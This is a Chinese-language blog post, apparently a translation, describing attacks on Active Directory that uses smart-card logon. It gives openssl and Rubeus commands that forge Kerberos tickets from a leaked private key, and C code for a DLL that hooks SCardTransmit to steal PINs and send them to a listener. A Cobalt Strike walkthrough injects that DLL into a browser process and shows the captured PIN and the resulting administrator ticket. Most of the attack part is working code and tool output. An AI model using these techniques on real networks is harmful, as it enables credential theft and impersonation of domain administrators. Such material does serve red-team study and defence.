主頁 >  其他 > 針對基于智能卡進行認證的活動目錄攻擊

針對基于智能卡進行認證的活動目錄攻擊

2023-05-16 12:31:42 其他

最近,我參與了一項攻擊基于智能卡的活動目錄的作業,實際上,你根本不需要使用物理智能卡來驗證登錄這個活動目錄,證書的屬性決定了它是否可以用于基于智能卡進行登錄,因此,如果你能獲得相應的私鑰,那么就可以繞過智能卡的驗證實作登錄,

當用戶被設定為基于智能卡進行登錄時,在它的默認配置中,域控制器將接受任何由它所信任的證書授權機構簽署的、符合以下規范的證書:

    ● CRL的分配點不可為空、并且可用

    ● 證書的密鑰要使用數字簽名

    ● 增強型的密鑰使用:

       - 智能卡登錄

       - 客戶端認證(可選,用于基于SSL的認證)

    ● 包含用戶UPN的主題替代名稱

此外,如果啟用了允許使用無擴展密鑰的證書屬性組策略,那么就沒必要使用增強型的密鑰,因為這可能會導致發給域用戶或計算機的其他型別的證書,

img

下面是我們的具體的研究程序,

PKINIT

正如我們所知的,域內的活動目錄會使用Kerberos協議來驗證域名,攻擊者可以使用像Rubeus、Mimikatz、Kekeo和impacket這樣的工具來針對域環境進行利用,

那么,基于 PKI 的認證與 Kerberos 的認證有什么關系呢?早在 2006 年,微軟和航空航天公司聯合提交了 RFC 4556,這協議引入了對 Kerberos 預認證的公鑰密碼學的支持,

預認證方法可以防止Kerberos對賬戶密碼進行離線暴力攻擊,如果沒有在AD賬戶上啟用預認證,那么用戶就容易受到AS-REP的攻擊,隨著預認證的引入,那么最初的AS-REQ Kerberos請求就會包含一個加密的時間戳,并且這個用來加密的密鑰來自于用戶的密碼,這向 KDC 證明了請求登錄的用戶確實知道賬戶密碼,因此,KDC就會回傳一個與用戶密碼相關的加密的AS-REP(對AS-REQ的回應),預認證資料包含的一個時間戳也可以防止重放攻擊,如果預認證資料無效,KDC會回傳一個錯誤,而且也不允許對AS-REP回應密鑰進行暴力破解,如果一個攻擊者能夠在一個網路中抓取 Kerberos的回應資料包,那么針對AS-REP 的修改仍然是可能的,

基于 PKI 的認證同樣也是以類似的方式進行作業,它首先會使用 Kerberos 預認證來證明用戶是他們所說的那個人,同樣,它也會使用一個時間戳,但不是使用用戶的密碼生成的密鑰對資訊進行加密,而是用屬于證書的私鑰以PKCS #7加密資訊語法(CMS)的形式來簽署資訊,該私鑰可以存盤于物理智能卡上,并且也可以以其他的形式進行存盤,這其中也包括不那么安全的方法,一旦KDC驗證了CMS有效載荷的簽名,并且一切正常,那么AS-REP就會回傳給客戶,PKINIT也會對AS-REP回應進行加密,因為在基于PKI的Kerberos登錄程序中并沒有使用密碼,所以用戶密鑰對客戶來說是未知的,為了解決這個問題,AS-REP要么使用一個使用Diffie-Hellman密鑰交換演算法獲得的密鑰進行加密,要么使用初始AS-REQ請求中使用的證書公鑰進行加密,并且這個初始請求也包含了關于哪種方法是首選的具體細節,

從這里開始,其他的一切還都保持不變,客戶端將會獲得一個有效的TGT,可用于申請TGS票據,并且該證書在TGT的有效期內就不再使用,在再次需要該證書的私鑰之前,一般會保持7天的有效期,當然,這并不是說在Windows登錄期間,私鑰在7天內不會被使用,如果機器被鎖定或用戶已經被注銷,那么Windows會像基于密碼的登錄那樣強制進行認證,但從攻擊者的角度來看,如果他們已經獲得了TGT,這其實就已經不重要了,

所以這里我開始嘗試在Rubeus中添加對PKINIT的支持,并創建了一個請求,

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

基于PKCS#12的認證(PFX)

這里我們討論的第一個攻擊場景是用戶私鑰泄露問題,我們可以使用一個PKCS#12證書庫,我們可以使用一個用戶的證書以及相應的私鑰來生成一個Kerberos TGT,一旦你有了私鑰blob和相應的證書,那么你就可以使用OpenSSL來生成PKCS12存盤,如下所示:

openssl pkcs12 -export -out leaked.pfx -inkey privateKey.key -in certificate.crt 

一旦你生成了一個有效的證書存盤,那么我們就可以使用Rubeus中新增加的內容來請求TGT了,如果你決定用密碼來保護證書庫,那么你可以在命令列中加入/password選項,

Rubeus.exe asktgt /user:Administrator /certificate:leaked.pfx /domain:hacklab.local /dc:dc.hacklab.local

然后,Rubeus將生成一個基于PKINIT的AS-REQ,使用我們所提供的證書庫來驗證用戶,如果一切順利,KDC就會回傳資料包,那么你就應該會得到類似的輸出:

 ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
      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
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  02/04/2023 16:01:12
  EndTime               :  03/04/2023 02:01:12
  RenewTill             :  09/04/2023 16:01:12
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  6tIiFytU5V2cgSpXt8skdw==

那么由此產生的 .kirbi Base64 編碼字串也可用于從 KDC中獲得正常的 TGS,

在我成功地在這個工具中使用了PKINIT之后,我開始思考我們該如何使用物理智能卡做認證,一旦用戶的機器受到攻擊破壞,那么使用智能卡進行認證最大的問題就是密碼,如果不知道PIN碼,那么我們就無法生成一個有效的AS-REQ,蠻力破解是不可行的,因為進行3次無效的嘗試,那么系統就會先進行賬號鎖定,

其中的一個思路就是,當用戶需要解鎖智能卡時可以嘗試捕獲PIN碼,這主要用于機器解鎖或者登錄網路上其他需要智能卡認證的服務,

經過一番調查,我發現了WinSCard DLL,這個DLL是與Smard Card服務通信的網關,然后這個服務就會控制智能卡的通信,一般來說,任何與Windows上的智能卡進行通信的東西都需要使用WinSCard API,

我所研究的WinSCard.dll中最重要的函式是SCardTransmit API,這個API是用于傳輸智能卡ISO/IEC 7816規范中所要求的應用協議資料單元(APDU)的API,這個是最底層的傳輸單元,主要是用于智能卡通信,


01.png

如果我們hook這個API,那么我們應該就能夠監視傳送到卡上的PDU,

LONG SCardTransmit(
  SCARDHANDLE         hCard,
  LPCSCARD_IO_REQUEST pioSendPci,
  LPCBYTE             pbSendBuffer,
  DWORD               cbSendLength,
  LPSCARD_IO_REQUEST  pioRecvPci,
  LPBYTE              pbRecvBuffer,
  LPDWORD             pcbRecvLength
);

pbSendBuffer引數是向卡片發送的APDU資料包,而pbRecvBuffer則是智能卡回傳的回應資料,

雖然ISO智能卡規范對某些命令類別和命令資料結構做出了限制,但這些限制通常是針對某些具體應用的,而不是由ISO智能卡規范本身定義的,并且為了滿足身份訪問的需求,NIST制定了個人身份驗證(PIV)SP 800-73-4規范,該規范涵蓋了智能卡應如何處理注冊到設備上的證書,以及實作該規范的所有APU,這個不需要太多的細節,在PIV規范中最重要的是第3.2.1節VERIFY卡命令,這些內容闡述了VERIFY APDU是如何在允許訪問存盤在卡片上的私鑰之前進行PIN的驗證,

因此,有了ISO規范中的資訊以及PIV規范中的3.2.1節,我們應該能夠寫一個hook程式來捕獲傳送到卡上的PIN,

DWORD WINAPI SCardTransmit_Hooked(SCARDHANDLE hCard,
    LPCSCARD_IO_REQUEST pioSendPci,
    LPCBYTE             pbSendBuffer,
    DWORD               cbSendLength,
    LPSCARD_IO_REQUEST  pioRecvPci,
    LPBYTE              pbRecvBuffer,
    LPDWORD             pcbRecvLength) {
     
    char debugString[1024] = { 0 };
    DWORD result = pOriginalpSCardTransmit(hCard, pioRecvPci, pbSendBuffer, cbSendLength, pioRecvPci, pbRecvBuffer, pcbRecvLength);
    //Check for CLA 0, INS 0x20 (VERIFY) and P1 of 00/FF according to NIST.SP.800-73-4 (PIV) specification
    if (cbSendLength >= 13 && pbSendBuffer[0] == 0 && pbSendBuffer[1] == 0x20 && (pbSendBuffer[2] == 0 || pbSendBuffer[2] == 0xff)) {
        //Check card response status for success
        bool success = false;
        if (pbRecvBuffer[0] == 0x90 && pbRecvBuffer[1] == 0x00) {
            success = true;
        }
        char asciiPin[9];
        sprintf_s(debugString, sizeof(debugString), "Swipped VERIFY PIN: Type %s, Valid: %s, Pin: %s", GetPinType(pbSendBuffer[3]), success ? "true" : "false", 
            GetPinAsASCII(pbSendBuffer+5, min(pbSendBuffer[4],8), asciiPin));
        SendPINOverPipe(debugString);           
    }
    return result;
}

API呼叫做的第一件事就是呼叫原始的SCardTransmit函式,我們不僅需要研究資料請求,而且還要知道卡的回應資料,這樣我們就可以確定傳送給卡片的PIN碼是否正確,然后,該函式會查找VERIFY PDU來隔離驗證PIN的命令,一旦我們確定了VERIFY PDU,那么我們就可以開始檢查結果,0x90 0x00都表示PIN被審核,接下來,我們可以從發送緩沖區的偏移量5(PDU結構中的命令資料)的位置處提取PIN碼,最后,我們需要通過一個命名管道來傳輸PIN碼的詳細資訊,然后使用資料接收程式進行捕獲,

我們可以將這一功能打包到一個DLL中,該DLL也能夠進行反射性加載,那么我們可以將該DLL注入到我們所研究的行程中去,

Demo

假設在存在該漏洞的情況下,并且我已經有了一個Cobalt Strike信標連接到了受害者的作業站上,我所使用的是管理員賬戶,但其實普通用戶的賬戶也可以進行使用,PinSwipe DLL也可以被注入到一個高權限的行程中,如lsass,當獲得管理權限時,可以在登錄時刷出PIN碼,但使用普通用戶身份進行訪問時,你將會被限制在用戶模式行程中,如Internet Explorer等等,

所以首先我們需要啟動PinSwipeListener,這將可以dump出智能卡登錄EKU的用戶證書資訊,

beacon> execute-assembly C:\tools\PinSwipeListener.exe
[*] Tasked beacon to run .NET program: PinSwipeListener.exe
[+] host called home, sent: 112171 bytes
[+] received output:
[+] Found smart card logon certificate with thumbprint 55C65AB0B9B6A893A6E8449FB34DD61093B231D8 and subject CN=Administrator, CN=Users, DC=hacklab, DC=loca

有了監聽器,我們就需要選擇將PinSwipe.dll注入到哪些行程中,像Internet Explorer、Chrome等都是很好的選擇,因為在智能卡認證的環境中,這些程式會經常彈出請求PIN的資訊,在這里,我運行的是Internet Explorer,它的PID是 2678,實際上,IE和Chrome一樣,為瀏覽器的各種標簽都啟動了不同的子行程,所以你需要注入一個正確的行程,同時也可以使用其他更高級的攻擊腳本,不斷尋找新的IE行程并注入它們,

beacon> dllinject 2678 C:\tools\PinSwipe.dll
[*] Tasked beacon to inject C:\tools\PinSwipe.dll into 2678

一旦用戶在對話框中輸入了他們的PIN碼,PinSwipe就會捕獲請求并通過命名管道將其發送給PinSwipeListener,

img

[+] received output:
[+] PinSwipe: Swipped VERIFY PIN: Type PIV Card Application, Valid: true, Pin: 123456

PinSwipe的輸出除了顯示輸入的PIN號碼外,還將顯示輸入的PIN是否正確,一旦你獲取了PIN碼,你就可以使用新的Rubeus功能來請求使用用戶的物理智能卡進行TGT驗證,這一次,我們可以使用/certificate引數來指定所要使用的證書的檔案名,

beacon> execute-assembly C:\tools\Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[*] Tasked beacon to run .NET program: Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[+] host called home, sent: 357691 bytes
[+] received output:
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0 
[*] Action: Ask TGT
[+] received output:
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] received output:
[+] TGT request successful!
[+] received output:
[*] base64(ticket.kirbi):
      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
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  04/04/2023 19:55:29
  EndTime               :  05/04/2023 05:55:29
  RenewTill             :  11/04/2023 19:55:29
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  5K2V8xIaGbUS8ZYqTl120Q==

那么到此結束,你現在已經有了一個TGT,并且可以在7天內申請新的TGS票,然后訪問其他的網路資源,

當你在網路中使用物理智能卡時,最好的辦法是擁有需要手動按鍵的卡,或者最好是生物識別閱讀器,這樣一來,對用戶賬戶進行的任何攻擊都不會產生TGT資料,因為智能卡會在沒有物理按鍵或生物識別資料存在的情況下阻止對私鑰的訪問,

更多網安技能的在線實操練習,請點擊這里>>

 

合天智匯:合天網路靶場、網安實戰虛擬環境

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/552521.html

標籤:其他

上一篇:問鼎CodeXGLUE榜單,華為云UniXcoder-VESO-v1演算法取得突破

下一篇:返回列表

標籤雲
其他(159080) Python(38137) JavaScript(25421) Java(18044) C(15226) 區塊鏈(8267) C#(7972) AI(7469) 爪哇(7425) MySQL(7186) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5871) 数组(5741) R(5409) Linux(5340) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4572) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2433) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) .NET技术(1973) 功能(1967) Web開發(1951) HtmlCss(1936) python-3.x(1918) C++(1917) 弹簧靴(1913) xml(1889) PostgreSQL(1876) .NETCore(1860) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 針對基于智能卡進行認證的活動目錄攻擊

    最近,我參與了一項攻擊基于智能卡的活動目錄的作業。實際上,你根本不需要使用物理智能卡來驗證登錄這個活動目錄。證書的屬性決定了它是否可以用于基于智能卡進行登錄。因此,如果你能獲得相應的私鑰,那么就可以繞過智能卡的驗證實作登錄。 ......

    uj5u.com 2023-05-16 12:31:42 more
  • 問鼎CodeXGLUE榜單,華為云UniXcoder-VESO-v1演算法取得突破

    摘要:華為云PaaS技術創新團隊基于UniXcoder模型,在公開測驗資料集(CodeXGLUE)上的代碼搜索任務評測結果上取得突破,在CodeXGLUE榜單上排名中第一。 本文分享自華為云社區《代碼語意搜索演算法哪家強?華為云UniXcoder-VESO-v1演算法取得突破,問鼎CodeXGLUE榜單 ......

    uj5u.com 2023-05-16 12:31:29 more
  • Python Numpy 切片和索引(高級索引、布爾索引、花式索引)

    張量(Tensor)、標量(scalar)、向量(vector)、矩陣(matrix) Python Numpy 切片和索引(高級索引、布爾索引、花式索引) Python NumPy 廣播(Broadcast) NumPy(Numerical Python) 是 Python 語言的一個擴展程式庫, ......

    uj5u.com 2023-05-16 12:31:01 more
  • 花了1塊錢體驗一把最近很火的ChatGPT

    前言 最近 OpenAI 發布了 ChatGPT,一經發布就在科技圈火得不行。 ChatGPT是什么呢? 簡單得說,ChatGPT,是一種基于對話的 AI 聊天工具。我們來看看ChatGPT自己得回答。 下面是在ChatGPT注冊成功后,正常使用后的截圖 這兩天也是被傳得神乎其神,聽說它寫得了代碼、 ......

    uj5u.com 2023-05-16 12:25:13 more
  • 問鼎CodeXGLUE榜單,華為云UniXcoder-VESO-v1演算法取得突破

    摘要:華為云PaaS技術創新團隊基于UniXcoder模型,在公開測驗資料集(CodeXGLUE)上的代碼搜索任務評測結果上取得突破,在CodeXGLUE榜單上排名中第一。 本文分享自華為云社區《代碼語意搜索演算法哪家強?華為云UniXcoder-VESO-v1演算法取得突破,問鼎CodeXGLUE榜單 ......

    uj5u.com 2023-05-16 12:18:17 more
  • 百度飛槳(PaddlePaddle) - PaddleOCR 文字識別簡單使用

    百度飛槳(PaddlePaddle)安裝 OCR 文字檢測(Differentiable Binarization DB) OCR的技術路線 PaddleHub 預訓練模型的網路結構是 DB + CRNN, 可微的二值化模塊(Differentiable Binarization,簡稱DB) CRN ......

    uj5u.com 2023-05-16 12:12:45 more
  • 云原生周刊:GitOps 的 4 條核心原則

    日前在溫哥華舉行的 cdCON + GitOpsCon 上,分享內容以 GitOps 原則為特色: GitOps 是宣告式的; GitOps 應用程式是版本化的和不可變的; 自動拉取 GitOps 應用程式; GitOps 應用程式不斷協調。 原文鏈接:https://thenewstack.io/ ......

    uj5u.com 2023-05-16 12:06:17 more
  • 玩轉服務器之環境篇:PHP和Python環境部署指南

    前幾篇文章中講解了如何搭建docker和Java Web環境的方法,本篇文章來教大家搭建一個好的PHP和Python環境,可以幫助開發和運行PHP和Python應用程式,使其更加高效和穩定。 一、 PHP環境介紹 好的開發環境無疑會大大提升編碼效率,近日鉆研了一下Python環境安裝的問題,稍加總結 ......

    uj5u.com 2023-05-16 12:06:12 more
  • 華為云云原生視窗:一文回顧Q1精彩瞬間

    摘要:一文速覽2023年Q1期間華為云云原生相關動態資訊。 華為云云原生動態 華為云海外首發CCI Serverless容器服務 在MWC23 巴展期間,華為云海外首發CCI Serverless容器服務正式上線。其具備聚焦應用免運維、極致計算性能、智能統籌彈性等優勢…… Serverless容器構 ......

    uj5u.com 2023-05-16 12:06:01 more
  • 寶蘭德應用服務器軟體與華為云GaussDB完成兼容互認證

